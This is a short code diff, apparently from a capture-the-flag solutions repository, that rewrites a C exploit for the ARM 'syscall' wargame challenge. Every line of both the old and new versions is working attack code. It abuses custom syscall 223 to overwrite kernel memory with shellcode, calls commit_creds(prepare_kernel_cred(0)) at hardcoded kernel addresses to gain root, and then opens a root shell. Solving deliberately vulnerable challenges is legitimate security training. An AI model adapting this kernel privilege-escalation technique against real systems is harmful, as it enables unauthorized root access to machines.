kernel syscall; arm

pwnable_syscall/exploit.c

@@ -1,36 +1,17 @@
-#define _GNU_SOURCE    
+#include <unistd.h>
 #include <sys/syscall.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/mman.h>
 
-#define SYS_UPPER 223  
-
-struct cred;
-struct task_struct;
-
-typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
-  __attribute__((regparm(3)));
-typedef int (*commit_creds_t)(struct cred *new)
-  __attribute__((regparm(3)));
-
-prepare_kernel_cred_t prepare_kernel_cred;
-commit_creds_t commit_creds;
-
-static void kernel_code(void)
+void get_root()
 {
-    commit_creds(prepare_kernel_cred(0));
-    return;
+	char* (*prepare_kernel_cred)(int) = 0x8003f924;
+	void (*commit_creds)(char *) = 0x8003f56c;
+	(*commit_creds)((*prepare_kernel_cred)(0));
 }
 
-char shellcode[] = "\x01\xf0\xa0\xe1";  // mov pc, r1                                          
-
-void main() {
-        prepare_kernel_cred = 0x8003f924;
-        commit_creds = 0x8003f56c;
-        syscall(SYS_UPPER, shellcode, 0x7f000000);
-        puts("[*] overwrote syscall sys_upper with shellcode\n");
-        syscall(SYS_UPPER, 0x7f000000, kernel_code);
-        puts("[+] got r00t?\n");
-        system("/bin/sh");
+int main()
+{
+	char shellcode[] = "\x01\xf0\xa0\xe1"; // mov pc, r1
+	syscall(223, shellcode, 0x7f000000);
+	syscall(223, 0x7f000000, get_root);
+	system("/bin/sh");
 }